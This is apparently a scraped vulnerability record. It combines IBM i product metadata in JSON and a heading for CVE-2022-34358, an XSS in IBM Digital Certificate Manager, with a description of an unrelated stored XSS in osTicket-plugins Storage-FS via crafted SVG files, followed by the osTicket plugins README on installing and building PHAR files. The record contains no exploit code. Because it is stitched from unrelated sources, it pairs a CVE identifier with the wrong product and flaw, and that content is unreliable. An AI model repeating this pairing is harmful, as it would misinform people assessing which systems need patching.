\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSB23CE","label":"IBM i 7.5 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG60","label":"IBM i"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0,7.4.0,7.3.0,7.2.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSC5L9","label":"IBM i 7.2"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.2.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SS9QQS","label":"IBM i 7.4"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.4.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSTS2D","label":"IBM i 7.3"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.3.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2022-34358: Security Bulletin: Digital Certificate Manager for IBM i is vulnerable to cross-site scripting (CVE-2022-34358)

A stored cross-site scripting (XSS) vulnerability in the component audit/class.audit.php of osTicket-plugins - Storage-FS before commit a7842d494889fd5533d13deb3c6a7789768795ae allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file.

**Core plugins for osTicket**

Core plugins for osTicket-1.8 and onward

**Installing**

Clone this repo or download the zip file and place the contents into your include/plugins folder

After cloning, hydrate the repo by downloading the third-party library dependencies.

**Building Plugins**

Make any necessary additions or edits to plugins and build PHAR files with the make.php command

    php -dphar.readonly=0 make.php build <plugin-folder>
    

This will compile a PHAR file for the plugin directory. The PHAR will be named plugin.phar and can be dropped into the osTicket plugins/ folder directly.

**Translating**

Translation service is being performed via the Crowdin translation management software. The project page for the plugins is located at

https://crowdin.com/project/osticket-plugins

Tag

#xss